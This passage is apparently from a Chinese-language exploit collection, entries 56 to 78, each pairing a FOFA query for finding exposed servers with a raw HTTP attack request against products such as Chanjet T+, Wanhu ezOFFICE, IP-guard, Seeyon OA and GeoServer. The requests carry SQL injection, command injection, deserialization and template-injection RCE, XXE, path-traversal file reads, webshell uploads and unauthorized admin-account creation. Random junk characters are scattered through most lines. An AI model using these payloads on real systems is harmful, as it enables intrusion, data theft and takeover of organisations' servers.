/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers2 A5 [2 U9 b- b) z( h, P3 x

/ X/ k! _* J% ]& H& R7 c1 l$ E7 l56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
" T$ R2 @, o  J6 Y0 g, W8 `FOFA: app="畅捷通-TPlus"  b1 U  r& q, h( z
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
! _; ]2 i! g$ wHost: x.x.x.x& i9 `; Q8 x" j" t" v# R
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36- b) G. B! I; k7 ]) ^' @& h5 `
Content-Type: application/json% Y: V) J% Z. M! {

, j: _( v1 V& u$ s  K# N  l{' @$ m6 h. T/ O- t2 F! [9 h' b0 n& Y- m
  "storeID":{- R- n3 @. m! w5 M
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
- a& z. W2 e9 p  e! Z" R2 M1 ^# f   "MethodName":"Start",
2 P, d4 S: K  Y    "ObjectInstance":{7 |' _4 {( J) K2 ~, d* _* g
       "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",9 L' k+ O  l+ G( \
        "StartInfo": {) \' z/ x, F& r/ p  ^
           "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
: G0 T5 b6 e5 b2 F8 `. d$ @! N           "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
/ z. y9 [' M$ v9 |% ~6 q( k4 ^; e2 e       }
; s5 X# R# w: X    }
& X$ `( C( M$ G6 W1 J- H1 u3 o  }% ^6 F( O6 L! h* j" n: O) [0 i. c
}
0 [8 ~0 Z9 M% V% G" Y- G# I5 T
' ]" f; i1 A1 c7 f
) m1 Z) Z. s' A1 e57. 畅捷通T+ keyEdit.aspx SQL注入- K% I, z) \  Q  o0 b; [( f
FOFA:app="畅捷通-TPlus"$ F3 F  W+ X0 o1 J
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1/ g; ]1 V9 \0 S7 t$ o
Host: host
  h0 G1 A9 E# H" M8 [User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36# ?* A* T; X$ y* S& h5 C; H
Accept-Charset: utf-8
8 d# ^' Z' @) K8 ^9 @. G5 u! e- tAccept-Encoding: gzip, deflate$ q- o0 @: G) ^6 N0 @- }. K5 ~
Connection: close% @* l& [$ R8 [; _! w* ?

$ U) d* ?9 m- y5 K! a7 |  d; }9 I6 [+ k
58. 畅捷通T+ KeyInfoList.aspx sql注入
! y* n  ]* q" f, ]1 gFOFA:app="畅捷通-TPlus"6 q- W2 F+ h$ j$ k: g/ E: Y5 u* O$ |
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1( a* U4 K' P& g6 N+ V2 H
Host: your-ip+ N! i8 f0 j' r1 i) J
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
8 M: {0 P* o$ R0 P9 W# p2 h/ p- m; ?Accept-Charset: utf-8: M( Z5 ~* l; L9 ?/ X
Accept-Encoding: gzip, deflate' X1 c; |% a: d. F  n- ?
Connection: close
" k) J) `' F  x; ~' A( K- ^: o$ @7 x# ~4 x7 _: ~( r
8 _3 Q" g$ V: A: U3 Z
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
* J. j$ e6 E& m! t( zFOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
+ A2 J. ~2 b7 Q  I2 t) oPOST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
* a  J/ y; n+ X( g& A! G4 ?Host: 192.168.86.128:9090. C2 d( F, i  C/ }* L4 b- R
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36" m+ l0 q7 K# j0 ]  |1 W/ q
Connection: close# ~# M  m- E8 c! J$ C8 E8 }
Content-Length: 1669
4 M# X; j$ P# ^# M# L2 XAccept: */*
6 }# c8 n. ?3 ^: u, }9 XAccept-Language: en4 d7 p( q% R# N7 D
Content-Type: application/x-www-form-urlencoded
( U/ p- Z2 }2 U( \% G0 R9 WAccept-Encoding: gzip
" k% W+ {" D1 i7 s& _3 d! J) D) X: p6 b
PAYLOAD
: U; l, i& V. ~
: ^1 e7 Z2 r; g, L3 Z6 ?- e4 Y0 f  H
1 Z3 Q' f6 b' p0 F+ b60. 百卓Smart管理平台 importexport.php SQL注入) t/ ?3 t8 j, R! H+ n8 z/ @9 M9 c
FOFA:title="Smart管理平台"
% i3 D# y4 }# j2 CGET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
1 j9 v% Q) J* s9 E1 I4 IHost:" u" J* Y9 y9 e& e! x% I7 A9 v$ X" t( `% p
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
! n3 q% W% d8 k( KAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
8 G6 c) `. f, f# EAccept-Encoding: gzip, deflate
' r  z% k2 `9 b7 fAccept-Language: zh-CN,zh;q=0.95 N) n1 h& r8 u2 I1 b7 _! B
Connection: close
$ v5 k/ w# |, `! T
  {( v3 w( C5 d; J% |6 [, T. i' \' ]6 y" f4 r
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
+ m& D% k& Z) g; GFOFA: title="欢迎使用浙大恩特客户资源管理系统"4 \( A- {) K% a7 Y. L+ g, X! \0 r$ o
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
) u8 x) {3 _  Q0 ]% m  c( \Host: x.x.x.x
0 o2 e, f8 g$ e5 T  k& EUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+ A- k  Z( x5 L  J8 p/ p1 u; \Connection: close
, r$ V$ _" k5 L9 G8 Y# y! W7 x, l0 |7 ^Content-Length: 27
2 ^- j, }  i/ q5 t* h8 V% X4 bAccept: */*9 s& W( ^$ E8 e0 M2 }; w
Accept-Encoding: gzip, deflate
) e$ O1 D& E" W  gAccept-Language: en
. d: s% w! b4 N9 P  \! C9 aContent-Type: application/x-www-form-urlencoded/ [3 m, f6 ]: _% j5 H
5 G7 ~; S* h7 ]9 J: C+ [
8uxssX66eqrqtKObcVa0kid98xa2 y5 D" \& v. k/ H, b% L' i9 j3 B! _

  `0 a  J  E6 |8 |. N' d
: W6 F6 F8 L- a62. IP-guard WebServer 远程命令执行! i/ y4 D4 B7 Y; R, P
FOFA:"IP-guard" && icon_hash="2030860561"- [4 X( S! I+ S  M
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1% y3 y) E3 t  w' |6 Y
Host: x.x.x.x+ x$ O: @* Q0 Q* m/ q
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
' X9 K8 z) A/ |. G% b2 BConnection: close
* n, C, B, r* T, B. fAccept: */*
! D4 A" Q- i' @3 z7 ]) F, tAccept-Language: en
2 P" V) t; U/ gAccept-Encoding: gzip
+ t; _4 R# |. C5 G! P
4 J- I; T0 w% p* p1 X8 S! P# L& m, F9 o0 k
访问
; A" |9 p7 G9 I3 B0 ~# l; o9 x( E/ D, h
GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.11 |. Q4 O: ], S$ @% Z# o
Host: x.x.x.x
* O  o; j1 j9 T/ f( q. K2 L
* |$ m( e! V, u& ?8 n: [$ m  K% v
+ Y1 n, n3 w; L0 z) L  V$ [, I! d63. IP-guard WebServer任意文件读取( w( v9 }6 q/ _2 ?  B4 K) m
IP-guard < 4.82.0609.0# _5 M) k/ f9 c/ D
FOFA:icon_hash="2030860561"
4 C: d1 S: w! w& N% ]; c) ]POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.16 R6 {+ r8 B/ a
Host: your-ip
! U( V6 |/ }6 J. L/ f8 P" YUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36* V1 E* h# H9 B" u. x# u. D( E( n
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.71 l4 Y0 |! w! h1 s; {
Accept-Encoding: gzip, deflate
" Z; B$ @3 b9 A' j4 X1 }Accept-Language: zh-CN,zh;q=0.9
/ Z4 H. x  u  ~Connection: close# q. w8 B' O5 S" S3 P" V5 Y
Content-Type: application/x-www-form-urlencoded2 F. f) z5 P! o/ q; y* i. T) K8 t

' r" ^3 [8 |# B4 V5 d9 ]path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A& @2 N3 y" g0 _  ?+ O' H# @
; L! u  h0 x& k3 s& ~0 F
64. 捷诚管理信息系统CWSFinanceCommon SQL注入; y2 R" p! A9 u3 {+ b8 y
FOFA:body="/Scripts/EnjoyMsg.js". t: b7 K: M* `" U) r% {$ Z1 w
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
" P* r  p6 |7 X: w. E# VHost: 192.168.86.128:9001$ w4 `) c9 A& F
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36/ |' w. g% K- ?/ q, C) l9 e
Connection: close: o4 Q* g# O0 ]. d
Content-Length: 369
6 W% T% C: t) x- [: |Accept: */*) |" r; M6 i5 v: i
Accept-Language: en7 g6 d0 l! J$ d. Y" c0 T. m
Content-Type: text/xml; charset=utf-81 O# |. d7 l# s$ O
Accept-Encoding: gzip
0 m  Y, b; S2 q/ ]4 D. _. J, N
6 G" _) ]! J& D# i6 j, @<?xml version="1.0" encoding="utf-8"?>+ u9 G7 b+ g( n+ X! g( K
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">6 X/ e2 X3 ~" j7 p9 `, m9 u7 W7 E3 ]
<soap:Body>
& j, B+ v, J. Y. T; F/ I, l    <GetOSpById xmlns="http://tempuri.org/">- r8 _$ p* w2 ~# i+ C
      <sId>1';waitfor delay '0:0:5'--+</sId>) w' S' ]3 f4 t! e1 V: p$ V; s/ j
    </GetOSpById># v- z$ r, C( o! e
  </soap:Body>
* U' I' E! ~! M9 t) ~3 q7 W</soap:Envelope>  |+ x8 }8 X- F* V. S% V

$ z; A) B  _* \+ d! J0 f+ k5 C- _, d1 O% n( S# `+ s
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过/ X; S9 S3 F. w- s! s  t, g
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
0 S0 j( b" E( R3 M响应200即成功创建账号test123456/123456
4 z% S5 u, S- \9 WPOST /SystemMng.ashx HTTP/1.1  D: S8 g7 c1 y- e" t+ D0 ^
Host:
, b! W- e) n  dUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
' d1 B5 X' o4 U3 D2 M$ T  z% ]Accept-Encoding: gzip, deflate; p: ~: L! I: s
Accept: */*
- |+ ]. g4 X) yConnection: close
0 X) d/ U. j  S: S* O4 KAccept-Language: en) N! X9 C. T: z- X) f
Content-Length: 174/ L0 p$ K: T1 B: u
5 p- W% a3 u7 `2 _! G
operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators+ M! _" H5 k+ {7 y
! a4 Y7 ?3 p  `) T6 |# l8 T

! d0 F" A. f" D* E66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入; D, P7 O) i; J/ F6 W
FOFA:app="万户ezOFFICE协同管理平台"( R$ t1 a7 k/ |7 H

: E2 l# b- x* wGET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
6 g& ^1 a# V2 h1 gHost: x.x.x.x
+ o6 k, Q5 ?  FUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36; Q4 d5 s4 X( U: N
Connection: close
; G7 O- t+ D+ D6 F: d0 @: UAccept: */*
$ @' ^, L) h) t* g/ v! T4 u1 c8 E3 VAccept-Language: en  t) G! X# a% \* i1 h2 ?
Accept-Encoding: gzip
# A, Z! G# P* t7 x0 a7 Y4 l
8 T9 C7 m+ d7 [! N6 k
- B/ v' L, M( Y5 W/ `第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在3 y) C& ?4 m4 G0 ]

9 E: t9 q9 Y' U5 Q7 v- N+ G% N8 J6 n67. 万户ezOFFICE wpsservlet任意文件上传: Q, P: ^3 Q; `" D; D3 ]' ^6 o" l
FOFA:app="万户网络-ezOFFICE"
& e& L  t9 }# m. j0 f* |newdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型
$ G( `8 h- ]' W  H! x* m' pPOST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1; Q+ J/ Y% x5 \3 t1 Y
Host: x.x.x.x; `) V( e4 A2 C4 T, g
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.04 n! e2 M2 B- v4 Y+ ^2 U( m
Content-Length: 1733 N3 G. {8 v' H# q' o' v) n8 _
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
6 i5 L' U8 Y( _8 K) OAccept-Encoding: gzip, deflate
2 N( R5 K: d/ f; zAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
: _/ ^( G6 O, b: Z  W# h5 nConnection: close
3 C# w/ Y! w( v$ Z" y; rContent-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp& f1 G1 N& Z8 G% D
DNT: 17 [; }* ^4 [7 K$ W0 L7 g
Upgrade-Insecure-Requests: 1! Q' d; }* L* G! U$ G: M
; }8 c( Y6 O1 @+ h1 v& W5 B
--ufuadpxathqvxfqnuyuqaozvseiueerp
% B4 z  O! l1 F; k/ dContent-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp": X7 ?6 H7 K' U

# w- V) g+ s; b6 Z<% out.print("sasdfghjkj");%>7 _% ]6 f& \" k& c3 Q3 s+ Q! Y
--ufuadpxathqvxfqnuyuqaozvseiueerp--
1 G7 v- v0 O# ?! r, _. c; N- i; A# h5 n9 N7 s1 V5 q7 a

7 _0 T+ C6 Y8 b% B: S文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp2 [' z7 V4 L7 `9 Q: |5 m$ d
/ [4 L' L) g9 t& G4 C$ h2 m
68. 万户ezOFFICE wf_printnum.jsp SQL注入- X! z$ k+ n+ z
FOFA:app="万户ezOFFICE协同管理平台"
+ G( h, T- V" }- x3 ~- P% RGET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1. l( U; l/ b- h4 T1 _
Host: {{host}}
4 g2 f7 ^- Y9 U) nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36# t2 Y* n2 t  |8 f( p. ^2 j0 u
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.81 A+ r1 O3 u7 r' ~0 y$ ~& n2 _
Accept-Encoding: gzip, deflate0 l+ `; w5 P7 V3 _5 X6 Q/ }" `
Accept-Language: zh-CN,zh;q=0.9' _6 t9 }5 ^/ k3 b' d
Connection: close/ ?' {* k3 q) i0 Q
% Z. U9 v/ V: ~2 d
3 b  C+ T* j, i5 x8 c7 h" e$ b
69. 万户 ezOFFICE contract_gd.jsp SQL注入
. o$ }9 _9 b; t1 y9 I) I3 ~FOFA:app="万户ezOFFICE协同管理平台": s" Y+ O4 G$ i& s: ?
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1! I2 x- m0 D. q9 v7 h; d
Host: your-ip
3 A' _, Q* r2 ^" R2 a+ U) H/ _: iUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
' k+ n8 `' g! D, C* S8 RAccept-Encoding: gzip, deflate
8 t0 ]: w2 j9 HAccept: */*
4 s0 M# x4 y2 b% hConnection: keep-alive
1 X3 c9 ?; G* d( D2 y+ `# q7 u3 [/ [. W& L2 }* r" k

  h* H0 m/ |3 r8 u1 M70. 万户ezEIP success 命令执行  P# c; C! Y8 x/ I/ T- |9 T7 D; f8 T5 v5 W
FOFA:app="万户网络-ezEIP"
& a  w$ g2 W( t+ J# x* G, `POST /member/success.aspx HTTP/1.1
- u) X5 M" b4 C4 [* pHost: {{Hostname}}; Y2 e7 ~# |5 B" K- ^
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36' C  B4 B- \4 b
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
6 \  ?6 E" g9 i) K2 E9 gContent-Type: application/x-www-form-urlencoded8 E' {8 t7 ^* b/ r" x. U0 @" F1 A
TYPE: C+ o: J& a1 O, ~% i* P1 q
Content-Length: 167028 r! S0 X+ H/ p
1 d5 p2 K% |5 q7 f. E7 w
__VIEWSTATE=PAYLOAD
+ V: w! h2 p1 S8 a2 i
1 J  r( T& R8 W8 d* [
! G# \% |9 D0 z# p7 t71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入+ _  j+ U) m6 A5 `+ }  J
FOFA:body="PM2项目管理系统BS版增强工具.zip"
/ J7 y: L& j2 cGET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
8 l% A0 |& H1 M. F: |) FHost: x.x.x.xx.x.x.x
, N' Q0 U! U9 OUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
1 T2 X6 h2 g' j; `8 }# |  r& |4 QConnection: close, r3 _8 l( u* O1 D  M2 f% ~3 N
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8- o9 q0 I& u! ]" L' ?" d3 a
Accept-Encoding: gzip, deflate
/ @! K, D& Z+ r! ^! Q; NAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2# v: W- u* d/ _* S% x
Upgrade-Insecure-Requests: 1
9 U. A4 I( W3 B) ~9 |) ^+ S; ^& P7 f" ~6 `  `& f" f( {
: m; D0 r0 P5 Y0 K4 @' ~% `9 q# u
72. 致远OA getAjaxDataServlet XXE  I, U5 J. ?1 }3 r. }
FOFA:app="致远互联-OA"
7 H* W& J9 [2 j( B' {. S5 L  J0 ^POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1# z6 \& Y6 U; S; o4 |4 Q5 P- Q# c
Host: 192.168.40.131:8099
. W4 ^7 o, o. S- {  U" w6 {1 ^- RUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36+ c( P+ n, S% M  N- p
Connection: close" T" G/ e+ ?/ w4 |- D
Content-Length: 583# z& Z& T# F+ s2 G
Content-Type: application/x-www-form-urlencoded. H! C& P. [) \9 E
Accept-Encoding: gzip3 }4 W7 [5 S6 |2 z7 J
, W& H  B- E, I4 Y1 c! M
S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E% Q$ \6 i" F; {4 ^( L/ Q+ r( W# q
% Q( \" v; N( K% o1 C) a4 |

0 P8 d4 s: E3 M1 e9 h3 w73. GeoServer wms远程代码执行" M: I- _# A$ h- S; Q/ T% w. ~; X
FOFA:icon_hash=”97540678”- L# b, A8 c( A9 g: J5 n' M
POST /geoserver/wms HTTP/1.1
- d, f* n0 o6 [4 ~Host:
0 o% |! [* D" b9 w, lUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36( X* i  w. s! ~- T+ f
Content-Length: 19818 @/ c# r' V+ `1 Q3 G( ~
Accept-Encoding: gzip, deflate
" S3 h% W( m+ c  @% Z9 ~Connection: close
- v& l+ U4 J% F$ K, W. {0 @: w* lContent-Type: application/xml( s# S0 x; t, V& v- C% t; h7 c
SL-CE-SUID: 34 f' D9 H5 e' M& H& j0 d  U* B& j/ `

4 R( O7 b+ j6 l  c/ ?; V$ QPAYLOAD
. x/ i1 a) H0 \8 N. }0 ^7 v$ E( D: g
$ i( h6 V* i" u- n1 Z8 @
74. 致远M3-server 6_1sp1 反序列化RCE& b1 E# c* V( I$ j, [( h
FOFA:title="M3-Server"% J9 d+ @3 W1 \1 X3 Y3 N9 x
PAYLOAD
  {% e: r4 [# x8 s
( P8 \4 `( z9 U$ ]: j1 U% @75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE& W# g) a  ]) @/ C5 ]# j  n* _4 y  K
FOFA:app="TELESQUARE-TLR-2005KSH"( P. z) }) ~9 f2 z: g) X' y" o
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
2 p3 J: H( w& ?- A7 z8 n! N8 eHost: x.x.x.x
5 u, \, I, u) W3 P! xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
+ v7 D5 @# N7 G) \$ v0 p2 lConnection: close
9 l- f; p( p* p. AAccept: */*
. z& p4 Z/ Q& t7 H* BAccept-Language: en# d# x3 C* y9 C, S
Accept-Encoding: gzip
+ Z; n8 N. @! Y
8 }: I* c/ X( N) S6 ?
5 Q, S& d4 z3 {6 e/ s5 u8 d/ c( BGET /cgi-bin/test28256.txt HTTP/1.1
0 n7 W/ T3 U$ x; b/ DHost: x.x.x.x
# n" [2 S* [. h; X: u# z% z. U: L
7 H, d" [+ m9 Q: L8 V# H
7 o8 ~# q' V! S- o. u9 D& c( @76. 新开普掌上校园服务管理平台service.action远程命令执行
$ p' M4 V+ Q( \* ^% U  AFOFA:title="掌上校园服务管理平台"
' S& T5 q7 @+ X- LPOST /service_transport/service.action HTTP/1.1
7 M0 y. l$ ]! y! dHost: x.x.x.x
- W8 a, G& y5 T( ]User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0/ V  ~% @1 M2 \; ]. s8 W) `
Connection: close+ z1 @) M, N; ^2 I
Content-Length: 211. S. z$ j0 F8 L% J
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
. z( v, U- h5 W' j. zAccept-Encoding: gzip, deflate
3 D6 ~4 \, k% A- w8 n" Z; NAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+ _' ^. F: ?' w# `) t$ U0 GCookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4/ e" A% Z6 p, ?2 l1 m) h
Upgrade-Insecure-Requests: 1
. F% \" i4 m/ {' s* K& G1 u
4 {% X7 S+ `4 a6 ], W; ~3 O{
) C% q* w; T/ Z"command": "GetFZinfo",9 \; _, z& S- Q4 K$ L; Z2 O
  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"
9 G( |0 a9 k+ M" n; u3 |  ?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"9 }' e$ v. M4 u; o7 U5 J8 `8 I5 l7 T
}
/ }& V/ A5 ^1 H: T5 \7 g4 Z6 U5 e; k$ @& s+ g) L" T
! E) I1 q0 P5 m: N
GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
6 S4 w0 T* b- G* ^$ ~Host: x.x.x.x5 Z: ~# \, B, {! b4 N
* t% ~9 s6 l# [2 B+ s
/ G8 H& m' Q3 K6 H  I- U4 J

) l8 S4 X3 d6 u- t2 @77. F22服装管理软件系统UploadHandler.ashx任意文件上传2 C! k* J+ y1 ~3 k. n7 O
FOFA:body="F22WEB登陆"
( x* D4 p, P* K: }2 P; K& APOST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1% t$ Z- _  \0 J- B# U
Host: x.x.x.x
! R8 ^' B# v$ X/ b0 DUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36/ [3 y$ E/ z- \1 ~! M: n$ u
Connection: close
. E& b* l, a2 ZContent-Length: 433$ j% o' @3 E; R1 ~4 b0 Z
Accept: */*
) Q8 }) A8 W$ B6 |# i! kAccept-Encoding: gzip, deflate- |( C" j1 r7 K: p; b, N% \
Accept-Language: zh-CN,zh;q=0.9+ n: k0 z# }- u9 D! _+ a9 \
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix
, Z- c" e# Y7 n+ M1 Y9 M: ~# ]# l$ h8 H( z
------------398jnjVTTlDVXHlE7yYnfwBoix
+ ?. W2 Q0 l5 ]8 MContent-Disposition: form-data; name="folder"0 a1 w- I5 A* I: c2 i1 B; R- _* I! K! q1 u

+ y7 Z8 {0 N0 ]$ p1 s3 J/upload/udplog5 x( N  I8 k1 x# j3 ~  |
------------398jnjVTTlDVXHlE7yYnfwBoix
0 q2 H1 c: k" `Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
; u3 ]% e5 n0 _5 e' pContent-Type: application/octet-stream
' q& ^$ R5 z. e9 t! n' |/ Z8 E1 ]5 a3 ?' O6 L
hello1234567
. H9 n4 p" [8 \* ]+ K/ \6 v1 u2 r9 c4 t------------398jnjVTTlDVXHlE7yYnfwBoix
! V7 a. k7 ?8 v! _% p7 y7 GContent-Disposition: form-data; name="Upload"; Y5 H( |  G- ~7 T
* \4 E5 G5 z) T7 C" G& w- u
Submit Query
2 k6 b% z. U( ]. d8 `, d- H------------398jnjVTTlDVXHlE7yYnfwBoix--* R1 X+ Q5 ]' h
1 v* d) ~# e! D9 k! v" L
8 \3 c/ @% `* H9 H. b, ~
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
* z  Y# Q: O/ P/ }, f" [) IFOFA:icon_hash="2001627082"
6 F7 b5 n+ Y; {! O, o: w4 rPOST /Platform/System/FileUpload.ashx HTTP/1.1
" R5 ?$ d/ b0 k3 V# u+ T) PHost: x.x.x.x
